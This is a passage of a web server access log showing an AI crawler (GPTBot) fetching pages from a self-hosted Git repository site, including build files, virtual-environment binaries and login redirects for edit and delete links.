"/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/TestProject/build/CMakeFiles/3.31.10/CMakeSystem.cmake?display=rendered" [Client 74.7.227.38] [Length 11091] [Gzip 3.09] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/TestProject/build/CMakeFiles/3.31.10/CMakeSystem.cmake" +[17/Feb/2026:18:05:00 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/e54b4e832455afb83987fc146872a66900dee5c0/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CMakeCXXCompiler.cmake?display=rendered" [Client 74.7.227.38] [Length 11074] [Gzip 3.12] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/e54b4e832455afb83987fc146872a66900dee5c0/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CMakeCXXCompiler.cmake" +[17/Feb/2026:18:05:01 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/e54b4e832455afb83987fc146872a66900dee5c0/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CMakeCXXCompiler.cmake?display=source" [Client 74.7.227.38] [Length 15244] [Gzip 5.10] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/e54b4e832455afb83987fc146872a66900dee5c0/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CMakeCXXCompiler.cmake" +[17/Feb/2026:18:05:01 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/TestProject/build/CMakeFiles/3.31.10/CMakeSystem.cmake?display=rendered" [Client 74.7.227.38] [Length 11087] [Gzip 3.09] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/TestProject/build/CMakeFiles/3.31.10/CMakeSystem.cmake" +[17/Feb/2026:18:05:02 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/TestProject/build/CMakeFiles/TestApp.dir/link.d?display=source" [Client 74.7.227.38] [Length 13312] [Gzip 4.76] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/TestProject/build/CMakeFiles/TestApp.dir/link.d" +[17/Feb/2026:18:05:02 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CMakeCXXCompiler.cmake?display=rendered" [Client 74.7.227.38] [Length 11107] [Gzip 3.11] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CMakeCXXCompiler.cmake" +[17/Feb/2026:18:05:03 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/C++Project/TestProject/build/CMakeFiles/3.31.10/CMakeSystem.cmake?display=rendered" [Client 74.7.227.38] [Length 11088] [Gzip 3.09] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/C++Project/TestProject/build/CMakeFiles/3.31.10/CMakeSystem.cmake" +[17/Feb/2026:18:05:03 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CMakeCXXCompiler.cmake?display=rendered" [Client 74.7.227.38] [Length 11138] [Gzip 3.10] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CMakeCXXCompiler.cmake" +[17/Feb/2026:18:05:04 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CMakeCXXCompiler.cmake?display=source" [Client 74.7.227.38] [Length 15192] [Gzip 5.11] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CMakeCXXCompiler.cmake" +[17/Feb/2026:18:05:04 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/TestProject/build/CMakeFiles/3.31.10/CMakeSystem.cmake?display=rendered" [Client 74.7.227.38] [Length 11090] [Gzip 3.09] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/TestProject/build/CMakeFiles/3.31.10/CMakeSystem.cmake" +[17/Feb/2026:18:05:05 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/TestProject/build/CMakeFiles/3.31.10/CMakeSystem.cmake?display=rendered" [Client 74.7.227.38] [Length 11089] [Gzip 3.09] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/TestProject/build/CMakeFiles/3.31.10/CMakeSystem.cmake" +[17/Feb/2026:18:05:05 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/e54b4e832455afb83987fc146872a66900dee5c0/C++Project/TestProject/build/CMakeFiles/3.31.10/CMakeSystem.cmake?display=rendered" [Client 74.7.227.38] [Length 11065] [Gzip 3.10] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/e54b4e832455afb83987fc146872a66900dee5c0/C++Project/TestProject/build/CMakeFiles/3.31.10/CMakeSystem.cmake" +[17/Feb/2026:18:05:06 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CMakeCXXCompiler.cmake?display=rendered" [Client 74.7.227.38] [Length 11100] [Gzip 3.11] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CMakeCXXCompiler.cmake" +[17/Feb/2026:18:05:06 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project/TestProject/build/CMakeFiles/TestApp.dir/link.d?display=source" [Client 74.7.227.38] [Length 13312] [Gzip 4.76] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project/TestProject/build/CMakeFiles/TestApp.dir/link.d" +[17/Feb/2026:18:05:07 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/C++Project/TestProject/build/CMakeFiles/3.31.10/CMakeSystem.cmake?display=rendered" [Client 74.7.227.38] [Length 11091] [Gzip 3.09] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/C++Project/TestProject/build/CMakeFiles/3.31.10/CMakeSystem.cmake" +[17/Feb/2026:18:05:07 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CMakeCXXCompiler.cmake?display=source" [Client 74.7.227.38] [Length 15155] [Gzip 5.12] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CMakeCXXCompiler.cmake" +[17/Feb/2026:18:05:08 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CMakeCXXCompiler.cmake?display=source" [Client 74.7.227.38] [Length 15192] [Gzip 5.11] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CMakeCXXCompiler.cmake" +[17/Feb/2026:18:05:08 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/.Backup/html/assets/js/i18n.js?display=source" [Client 74.7.227.38] [Length 26303] [Gzip 6.14] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/.Backup/html/assets/js/i18n.js" +[17/Feb/2026:18:05:09 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/.Backup/html/assets/js/i18n.js?display=rendered" [Client 74.7.227.38] [Length 10981] [Gzip 3.01] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/.Backup/html/assets/js/i18n.js" +[17/Feb/2026:18:05:09 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/branch/main/PostgresWatchdog/.vscode/tasks.json?display=rendered" [Client 74.7.227.38] [Length 11147] [Gzip 3.04] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/PostgresWatchdog/.vscode/tasks.json" +[17/Feb/2026:18:05:10 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/branch/main/asset_pilot_docker/.venv/bin/python" [Client 74.7.227.38] [Length 11282] [Gzip 3.03] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/branch/main/asset_pilot_docker/.venv/bin" +[17/Feb/2026:18:05:10 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/branch/main/asset_pilot_docker/.venv/bin/httpx" [Client 74.7.227.38] [Length 11746] [Gzip 3.16] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/branch/main/asset_pilot_docker/.venv/bin" +[17/Feb/2026:18:05:11 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/branch/main/.Backup/html/components/Contact.tsx?display=rendered" [Client 74.7.227.38] [Length 11174] [Gzip 3.04] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/.Backup/html/components/Contact.tsx" +[17/Feb/2026:18:05:12 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/branch/main/.Backup/html/components/Footer.tsx?display=rendered" [Client 74.7.227.38] [Length 11169] [Gzip 3.03] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/.Backup/html/components/Footer.tsx" +[17/Feb/2026:18:05:12 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/branch/main/PostgresMonitor/build/PostgresWatchdog/localpycs/struct.pyc" [Client 74.7.227.38] [Length 11190] [Gzip 3.05] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/PostgresMonitor/build/PostgresWatchdog/localpycs" +[17/Feb/2026:18:05:13 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/branch/main/GoldMonitor/Old_GoldMonitor.py?display=rendered" [Client 74.7.227.38] [Length 11112] [Gzip 3.03] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldMonitor/Old_GoldMonitor.py" +[17/Feb/2026:18:05:13 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/branch/main/PostgresPatrol/.python-version?display=rendered" [Client 74.7.227.38] [Length 11123] [Gzip 3.03] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/PostgresPatrol/.python-version" +[17/Feb/2026:18:05:14 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/branch/main/PostgresPatrol/env.example.txt?display=rendered" [Client 74.7.227.38] [Length 11125] [Gzip 3.03] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/PostgresPatrol/env.example.txt" +[17/Feb/2026:18:05:14 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/pulls?state=all&type=all" [Client 74.7.227.38] [Length 9896] [Gzip 3.47] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/pulls" +[17/Feb/2026:18:05:15 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/issues?state=all&type=all" [Client 74.7.227.38] [Length 10068] [Gzip 3.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/issues" +[17/Feb/2026:18:05:15 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/industrial-comm/build/cpp/Makefile?display=source" [Client 74.7.227.38] [Length 17052] [Gzip 5.65] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/industrial-comm/build/cpp/Makefile" +[17/Feb/2026:18:05:16 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/_edit/main/asset_pilot_docker/.venv/bin/python" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/branch/main/asset_pilot_docker/.venv/bin/python" +[17/Feb/2026:18:05:16 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4851] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/_edit/main/asset_pilot_docker/.venv/bin/python" +[17/Feb/2026:18:05:16 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/_edit/main/asset_pilot_docker/.venv/bin/httpx" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/branch/main/asset_pilot_docker/.venv/bin/httpx" +[17/Feb/2026:18:05:16 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4851] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/_edit/main/asset_pilot_docker/.venv/bin/httpx" +[17/Feb/2026:18:05:17 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/_delete/main/asset_pilot_docker/.venv/bin/python" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/branch/main/asset_pilot_docker/.venv/bin/python" +[17/Feb/2026:18:05:17 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4851] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/_delete/main/asset_pilot_docker/.venv/bin/python" +[17/Feb/2026:18:05:17 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/_delete/main/asset_pilot_docker/.venv/bin/httpx" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/branch/main/asset_pilot_docker/.venv/bin/httpx" +[17/Feb/2026:18:05:18 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4851] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/_delete/main/asset_pilot_docker/.venv/bin/httpx" +[17/Feb/2026:18:05:18 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/blame/branch/main/asset_pilot_docker/.venv/bin/httpx" [Client 74.7.227.38] [Length 10665] [Gzip 3.30] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/branch/main/asset_pilot_docker/.venv/bin/httpx" +[17/Feb/2026:18:05:18 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/commits/branch/main/asset_pilot_docker/.venv/bin/httpx" [Client 74.7.227.38] [Length 9825] [Gzip 2.88] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/branch/main/asset_pilot_docker/.venv/bin/httpx" +[17/Feb/2026:18:05:19 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/blame/branch/main/asset_pilot_docker/.venv/bin/python" [Client 74.7.227.38] [Length 10238] [Gzip 2.91] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/branch/main/asset_pilot_docker/.venv/bin/python" +[17/Feb/2026:18:05:19 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/commits/branch/main/asset_pilot_docker/.venv/bin/python" [Client 74.7.227.38] [Length 9836] [Gzip 2.88] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/branch/main/asset_pilot_docker/.venv/bin/python" +[17/Feb/2026:18:05:20 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/raw/branch/main/asset_pilot_docker/.venv/bin/python" [Client 74.7.227.38] [Length 7] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/branch/main/asset_pilot_docker/.venv/bin/python" +[17/Feb/2026:18:05:21 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/rss/branch/main/asset_pilot_docker/.venv/bin/python" [Client 74.7.227.38] [Length 955] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/branch/main/asset_pilot_docker/.venv/bin/python" +[17/Feb/2026:18:05:21 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/rss/branch/main/asset_pilot_docker/.venv/bin/httpx" [Client 74.7.227.38] [Length 887] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/branch/main/asset_pilot_docker/.venv/bin/httpx" +[17/Feb/2026:18:05:22 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/raw/branch/main/asset_pilot_docker/.venv/bin/httpx" [Client 74.7.227.38] [Length 248] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/branch/main/asset_pilot_docker/.venv/bin/httpx" +[17/Feb/2026:18:05:22 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/branch/main/PostgresMonitor/build/PostgresWatchdog/localpycs/struct.pyc" [Client 74.7.227.38] [Length 287] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/PostgresMonitor/build/PostgresWatchdog/localpycs/struct.pyc" +[17/Feb/2026:18:05:23 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/branch/main/PostgresMonitor/build/PostgresWatchdog/localpycs/struct.pyc" [Client 74.7.227.38] [Length 9872] [Gzip 2.88] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/PostgresMonitor/build/PostgresWatchdog/localpycs/struct.pyc" +[17/Feb/2026:18:05:23 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/rss/branch/main/PostgresMonitor/build/PostgresWatchdog/localpycs/struct.pyc" [Client 74.7.227.38] [Length 985] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/PostgresMonitor/build/PostgresWatchdog/localpycs/struct.pyc" +[17/Feb/2026:18:05:24 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/_new/main/asset_pilot_docker/.venv/bin/httpx" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/blame/branch/main/asset_pilot_docker/.venv/bin/httpx" +[17/Feb/2026:18:05:24 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4851] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/_new/main/asset_pilot_docker/.venv/bin/httpx" +[17/Feb/2026:18:05:24 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/_diffpatch/main/asset_pilot_docker/.venv/bin/httpx" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/blame/branch/main/asset_pilot_docker/.venv/bin/httpx" +[17/Feb/2026:18:05:24 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4851] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/_diffpatch/main/asset_pilot_docker/.venv/bin/httpx" +[17/Feb/2026:18:05:25 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/_new/main/asset_pilot_docker/.venv/bin/python" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/blame/branch/main/asset_pilot_docker/.venv/bin/python" +[17/Feb/2026:18:05:25 